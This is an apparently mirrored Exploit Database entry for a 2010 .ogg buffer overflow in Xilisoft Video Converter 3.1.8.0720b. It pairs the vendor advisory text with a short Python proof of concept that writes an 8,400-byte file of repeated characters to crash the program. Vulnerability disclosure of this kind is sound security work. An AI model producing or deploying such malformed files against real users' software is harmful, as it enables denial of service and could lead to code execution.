Xilisoft Video Converter 3.1.8.0720b – ‘.ogg’ Buffer Overflow

• Exploit Database
• 124 阅读

• 作者： Praveen Darshanam
  日期： 2010-08-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34480/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  source: https://www.securityfocus.com/bid/42473/info   Xilisoft Video Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.   Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.   Xilisoft Video Converter 3.1.8.0720b is vulnerable; other versions may also be affected.   ################PoC Start############################################## print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"   #Download from # http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1 #http://www.downloadatoz.com/xilisoft-video-converter/wizard.html   buff = "D" * 8400   try: oggfile = open("XilVC_ogg_crash.ogg","w") oggfile.write(buff) oggfile.close() print "[+]Successfully created ogg file\n" print "[+]Coded by Praveen Darshanam\n" except: print "[+]Cannot create File\n"   ################PoC End################################################